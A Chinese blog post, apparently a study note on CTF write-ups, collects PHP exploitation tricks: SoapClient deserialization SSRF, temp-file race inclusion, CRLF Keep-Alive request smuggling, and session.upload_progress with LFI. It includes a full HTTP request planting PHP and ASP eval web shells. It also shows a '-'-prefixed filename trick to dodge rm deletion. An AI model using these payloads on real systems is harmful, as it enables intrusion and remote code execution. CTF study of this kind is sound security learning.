n1 php,从N1CTF easy_php学到的几个骚操作

认真的拜读了师傅们关于N1CTF的各种writeup,收获了不少骚操作,记录下以备查找。

反序列化点SoapClient php自带类的利用

#使用的是SoapClient这个php自带类

# 当反序列化出来的对象调用不存在的函数是,就会调用__call方法,向外发送请求

$a = new SoapClient(null, array(

'location'=> "xxx.xxx.xxx.xxx:8000",

'uri'=> "123"

));

$res = serialize($a);

echo $res;

$a = unserialize($res);

$a->getsubtime();

测试:

4f47c79bc09cb1c0733a5dfa69882b8e.png

/tmp/临时文件竞争

要使用临时文件竞争,phpinfo的环境要有如下配置:

5510abed6f8eccf741a94659d5dea252.png

它大概的原理就是趁系统还没把临时文件删除之前将这个文件包含起来,从而getshell,通常系统的守护进行删除时隔很小,大概在2~3s,所以,我们要使用多线程上传,然后不断刷新包含文件。

Connection: Keep-Alive二次请求

当第一个请求的Connection为Keep-Alive的时候,接着的那个请求也会被响应。也就是说在一次HTTP连接中可以同时又多个HTTP请求头和请求体,但是当前请求被响应的前提是,前一个请求有Connection: Keep-Alive 。 (测试的时候需要注意Content-Length字段,需把burp中的repeater->update content-length选项关掉)

这里就也给了我们一个很重要的启示,如果我们遇到一个GET型的CRLF注入,但是我们需要的却是一个POST类型的请求,就可以用这种方式,在第一个请求中注入一个Connection: Keep-Alive,然后接着往下注入第二个请求,就可以实现我们的目的。

测试代码:

#alive.php

print_r($_GET);

print_r($_POST);

4a6bd6e4ad944e699cf747d3fe3c390e.png

sessions.upload_progress结合LFI getshell

当 session.upload_progress.enabled INI 选项开启时,PHP 能够在每一个文件上传时监测上传进度

参考资料:

基于session.upload_progress 的文件上传进度显示

Session 上传进度

本地使用wamp集成环境来做相应演示

session.upload_progress.enabled这个参数在php.ini 默认开启,需要手动置为Off

增加phpinfo.php页面

phpinfo();

?>

通过 phpinfo.php文件中很明显可见:

6707c543f3786c2bbfc0291166825278.png

同时可见存储路径:

57210836d6261f0aa1c23d52858c9f00.png

本地构造上传点,用burp抓包进行重发包

POST / HTTP/1.1

Host: 127.0.0.1:80

Proxy-Connection: keep-alive

Content-Length: 648

Cache-Control: max-age=0

Upgrade-Insecure-Requests: 1

Origin: null

Content-Type: multipart/form-data; boundary=----WebKitFormBoundary2rwkUEtFdqhGMHqV

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Cookie: PHPSESSID=5uu8r952rejihbg033m5mckb17

------WebKitFormBoundary2rwkUEtFdqhGMHqV

Content-Disposition: form-data; name="PHP_SESSION_UPLOAD_PROGRESS"

=`echo '<?php eval($_REQUEST[bertram])?>'>bertram.php`?>

------WebKitFormBoundary2rwkUEtFdqhGMHqV

Content-Disposition: form-data; name="file2"; filename="1.php"

Content-Type: text/php

------WebKitFormBoundary2rwkUEtFdqhGMHqV

Content-Disposition: form-data; name="file1"; filename="2.asp"

Content-Type: application/octet-stream

< %eval request("a")%>

------WebKitFormBoundary2rwkUEtFdqhGMHqV

Content-Disposition: form-data; name="submit"

Submit

------WebKitFormBoundary2rwkUEtFdqhGMHqV--

服务器就会在.E:/wamp/tmp/sess_5uu8r952rejihbg033m5mckb17中记录这个上传的文件。接着我们不断刷新生成包含恶意php代码的文件,然后通过LFI包含这个文件

利用bash的特性,绕过删除

情景设计,在目录/var/tmp/下一直执行命令rm *.jpg,我们这是该如何才能上传图片上去?

root@VM-201-111-ubuntu:/var/tmp# dir

spider.py

systemd-private-62f616023488426cba41eeaab4c972d3-systemd-timesyncd.service-DcTg0v

systemd-private-c5c2ed65cd2d419ba9d17715ccaa40f6-systemd-timesyncd.service-o93nCB

test

-test.txt

root@VM-201-111-ubuntu:/var/tmp# rm -test.txt

rm: invalid option -- 't'

Try 'rm ./-test.txt' to remove the file '-test.txt'.

Try 'rm --help' for more information.

root@VM-201-111-ubuntu:/var/tmp#

这是因为 bash在做*符号展开之后,直接把-test.jpg传给了rm命令,然后rm命令就把-后面内容全部作为参数解析,导致命令执行失败。

所以只需要上传一个以-开头的文件,就删除不掉了。

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值